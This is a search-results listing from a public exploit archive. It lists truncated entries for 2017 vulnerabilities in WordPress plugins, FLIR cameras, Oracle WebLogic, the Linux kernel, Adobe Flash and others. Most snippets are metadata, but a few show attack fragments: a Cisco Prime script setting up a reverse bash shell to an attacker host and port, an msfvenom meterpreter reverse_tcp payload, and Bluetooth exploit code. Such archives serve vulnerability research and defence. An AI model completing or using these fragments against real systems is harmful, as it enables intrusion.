41207 matches found
Trend Micro OfficeScan 11.0XG (12.0) - Code Execution Memory Corruption
Trend Micro OfficeScan 11.0XG 12.0 - Code Execution Memory Corruption + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt +...
SmarterStats 11.3.6347 - Cross-Site Scripting
SmarterStats 11.3.6347 - Cross-Site Scripting ---------------------------- Title: CVE-2017-14620 ---------------------------- TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries...
NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE Date: 27.09.2017 Software Link: https://www.netgear.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl...
LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)
LAquis SCADA 4.1.0.2385 - Directory Traversal Metasploit require 'msf/core' class MetasploitModule 'LAquis SCADA Web Server Directory Traversal Information Disclosure', 'Description' = %q This module exploits a directory traversal vulnerability found in the LAquis SCADA application. The...
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow , Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage:...
Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution
Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "...
WordPress Plugin WPAMS - SQL Injection
WordPress Plugin WPAMS - SQL Injection Exploit Title: WPAMS - Apartment Management System for wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837 Demo:...
AMC Master - Arbitrary File Upload
AMC Master - Arbitrary File Upload Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703 Dem...
WordPress Plugin Hospital Management System - SQL Injection
WordPress Plugin Hospital Management System - SQL Injection Exploit Title: Hospital Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634 Demo:...
SMSmaster - SQL Injection
SMSmaster - SQL Injection Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853 Demo:...
TicketPlus - Arbitrary File Upload
TicketPlus - Arbitrary File Upload Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316 Demo:...
Photo Fusion - Arbitrary File Upload
Photo Fusion - Arbitrary File Upload Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244 Demo:...
Job Links - Arbitrary File Upload
Job Links - Arbitrary File Upload Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089 Demo:...
WordPress Plugin WPGYM - SQL Injection
WordPress Plugin WPGYM - SQL Injection Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964 Demo:...
WordPress Plugin WPCHURCH - SQL Injection
WordPress Plugin WPCHURCH - SQL Injection Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251 Demo:...
WordPress Plugin School Management System - SQL Injection
WordPress Plugin School Management System - SQL Injection Exploit Title: School Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032 Demo:...
Tiny HTTPd 0.1.0 - Directory Traversal
Tiny HTTPd 0.1.0 - Directory Traversal ====================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal Date: 26-09-2017 Website: www.touhidshaikh.com Vulnerable Software: Tiny HTTPd Version...
Linux Kernel 3.10.0-514.21.2.el7.x86_64 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable PIE Local Privilege Escalation
Linux Kernel 3.10.0-514.21.2.el7.x86_64 3.10.0-514.26.1.el7.x86_64 CentOS 7 - SUID Position Independent Executable PIE Local Privilege Escalation / CVE-2017-1000253.c - an exploit for CentOS-7 kernel versions 3.10.0-514.21.2.el7.x86_64 and 3.10.0-514.26.1.el7.x86_64 Copyright (C) 2017 Qualys, Inc. This...
Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response
Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 The exploit gains code execution on the Wi-Fi firmware on the iPhone 7. The exploit has been tested against the Wi-Fi firmware as...
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow Exploit Title: Oracle 9i XDB HTTP PASS Buffer Overflow Date: 09/25/2017 Exploit Author: Charles Dardaman Twitter: https://twitter.com/CharlesDardaman Website: http://www.dardaman.com Version: 9.2.0.1 Tested on: Windows 2000 SP4 CVE: 2003-0727 This i...
FLIR Thermal Camera FFCPTD - Stream Disclosure
FLIR Thermal Camera FFCPTD - Stream Disclosure FLIR Systems FLIR Thermal Camera F/FC/PT/D Stream Disclosure Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2...
FLIR Thermal Camera FFCPTD - Information Disclosure
FLIR Thermal Camera FFCPTD - Information Disclosure FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA,...
FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution
FLIR Thermal Camera PT-Series PT-334 200562 - Root Remote Code Execution !/bin/bash FLIR Systems FLIR Thermal Camera PT-Series PT-334 200562 Remote Root Exploit Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.4...
Adobe Flash - Out-of-Bounds Read in applyToRange
Adobe Flash - Out-of-Bounds Read in applyToRange Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323 The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange. Proof of Concept:...
FLIR Thermal Camera FC-SPT - Command Injection
FLIR Thermal Camera FC-SPT - Command Injection FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3...
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322 The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash Proof of Concept:...
Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing
Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321 The attached MP4 file causes an out-of-bounds memory access when played in flash player. Proof of Concept:...
FLIR Thermal Camera FFCPTD - SSH Backdoor Access
FLIR Thermal Camera FFCPTD - SSH Backdoor Access FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA...
Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)
Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow SEH Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp...
HBGK DVR 3.0.0 build20161206 - Authentication Bypass
HBGK DVR 3.0.0 build20161206 - Authentication Bypass Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass Date: 24-09-2017 Vendor Homepage: http://www.hbgk.net/en/ Exploit Author: RAT - ThiefKing Contact: https://www.facebook.com/cctvsuperpassword Website: http://tromcap.com...
CyberLink LabelPrint 2.5 - Local Buffer Overflow (SEH Unicode)
CyberLink LabelPrint 2.5 - Local Buffer Overflow SEH Unicode !/usr/bin/python Exploit Title: CyberLink LabelPrint =2.5 File Project Processing Unicode Stack Overflow Date: September 23, 2017 Exploit Author: f3ci Vendor Homepage: https://www.cyberlink.com/ Software Link:...
Cash Back Comparison Script 1.0 - SQL Injection
Cash Back Comparison Script 1.0 - SQL Injection !/usr/bin/perl -w Exploit Title: Cash Back Comparison Script 1.0 - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://cashbackcomparisonscript.com/ Software Link: http://cashbackcomparisonscript.com/demo/features/ Demo:...
PHP Auction Ecommerce Script 1.6 - SQL Injection
PHP Auction Ecommerce Script 1.6 - SQL Injection Exploit Title: PHP Auction Ecommerce Script v1.6 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/php-auction-ecommerce-script/ Version: 1....
JitBit HelpDesk 9.0.2 - Authentication Bypass
JitBit HelpDesk 9.0.2 - Authentication Bypass Exploit Title: JitBit HelpDesk = 9.0.2 Broken Authentication Google Dork: "Powered by Jitbit HelpDesk" -site:jitbit.com Date: 09/22/2017 Exploit Author: Rob Simon Kc57 - TrustedSec www.trustedsec.com Vendor Homepage: https://www.jitbit.com/helpdesk/...
Lending And Borrowing - pid SQL Injection
Lending And Borrowing - pid SQL Injection Exploit Title: Lending And Borrowing Script - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://www.i-netsolution.com/ Software Link: http://www.i-netsolution.com/product/lending-borrowing-script/ Demo: http://74.124.215.220/realfund/...
Stock Photo Selling 1.0 - SQL Injection
Stock Photo Selling 1.0 - SQL Injection !/usr/bin/perl -w Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection Dork: N/A Date: 21.09.2017 Vendor Homepage: http://sixthlife.net/ Software Link: http://sixthlife.net/product/stock-photo-selling-website/ Demo: http://www.photoreels.com/...
Claydip Airbnb Clone 1.0 - Arbitrary File Upload
Claydip Airbnb Clone 1.0 - Arbitrary File Upload Exploit Title: Claydip Laravel Airbnb Clone 1.0 - Arbitrary File Upload Dork: N/A Date: 22.09.2017 Vendor Homepage: https://www.claydip.com/ Software Link: https://www.claydip.com/airbnb-clone.html Demo: https://www.claydip.com/airbnbdemo.html...
Secure E-commerce Script 1.02 - sid SQL Injection
Secure E-commerce Script 1.02 - sid SQL Injection Exploit Title: Secure E-commerce Script v1.02 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/ Version: 1.02...
Multi Level Marketing - SQL Injection
Multi Level Marketing - SQL Injection Exploit Title: Multi Level Marketing Script - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://www.i-netsolution.com/ Software Link: http://www.i-netsolution.com/product/multi-level-marketing-script/ Demo: http://74.124.215.220/advaemlm/...
ERS Data System 1.8.1 - Java Deserialization
ERS Data System 1.8.1 - Java Deserialization Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability Google Dork: N/A Date: 9/21/2017 Exploit Author: West Shepherd Vendor Homepage: http://www.ersdata.com Software Link: www.ersdata.com/downloads/ErsSetup.exe Version: 1.8.1.0 Tested on:...
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes GetFuncExprNameReference || funcInfo-funcExprScope && funcInfo-funcExprScope-GetIsObject ... Js::RegSlot ldFuncExprDst = sym-GetLocation; this-mwriter.Reg1Js::OpCode::LdFuncExpr, ldFuncExprDst; if sym-IsInSlotfuncInfo Js::RegSlot...
Microsoft Edge Chakra - JavascriptFunction::ReparseAsmJsModule Incorrectly Re-parses
Microsoft Edge Chakra - JavascriptFunction::ReparseAsmJsModule Incorrectly Re-parses GetParseableFunctionInfo; AssertfunctionInfo; functionInfo-GetFunctionBody-AddDeferParseAttribute; functionInfo-GetFunctionBody-ResetEntryPoint; functionInfo-GetFunctionBody-ResetInParams; FunctionBody funcBody =...
Linux Kernel 4.13.1 - BlueTooth Buffer Overflow (PoC)
Linux Kernel 4.13.1 - BlueTooth Buffer Overflow PoC Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS Crash only Date: 09/21/2017 Exploit Author: Marcin Kozlowski Version: Kernel version v3.3-rc1, and thus affects all versions from there on Tested on: Linux 4.4.0-93-generic...
Microsoft Edge - Chakra Incorrectly Parses Object Patterns
Microsoft Edge - Chakra Incorrectly Parses Object Patterns function f a: b = 0x1111, c = 0x2222, .c = 0x3333 = ; f;...
Microsoft Edge Chakra - Parser::ParseCatch Does Not Handle eval() (Denial of Service)
Microsoft Edge Chakra - Parser::ParseCatch Does Not Handle eval Denial of Service PnodeBlockType::Regular, isPattern ? ScopeTypeCatchParamPattern : ScopeTypeCatch; ... ParseNodePtr pnodePattern = ParseDestructuredLiteraltkLET, true /isDecl/, true /topLevel/, DICForceErrorOnInitializer; ... 1...
PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)
PHPMyFAQ 2.9.8 - Cross-Site Scripting 1 Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vendor Homepage: http://www.phpmyfaq.de/ Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip Exploit Author: Ishaq Mohammed Contact: https://twitter.com/securityprince Website:...
Apache Tomcat 9.0.1 (Beta) 8.5.23 8.0.47 7.0.8 - JSP Upload Bypass Remote Code Execution (1)
Apache Tomcat 9.0.1 Beta 8.5.23 8.0.47 7.0.8 - JSP Upload Bypass Remote Code Execution 1 E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html When running on Windows with HTTP PUTs enabled e.g. via setting the readonly initialisation parameter of the...
Android Bluetooth - Blueborne Information Leak (2)
Android Bluetooth - Blueborne Information Leak 2 from pwn import import bluetooth if not 'TARGET' in args: log.info"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX" exit target = args'TARGET' servicelong = 0x0100 serviceshort = 0x0001 mtu = 50 n = 30 def packetservice, continuationstate: pkt =...
DenyAll WAF 6.3.0 - Remote Code Execution (Metasploit)
DenyAll WAF 6.3.0 - Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "DenyAll Web Application Firewall Remote Code Execution", 'Description' = %q This module...
HPE 7.2 - Java Deserialization
HPE 7.2 - Java Deserialization !/usr/bin/env python HPE/H3C IMC - Java Deserialization Exploit Version 0.1 Tested on Windows Server 2008 R2 Name HPE/H3C IMC Intelligent Management Center Java 1.8.091 Author: Raphael Kuhn Daimler TSS Special thanks to: Jan Esslinger @Hngan for the websphere exploi...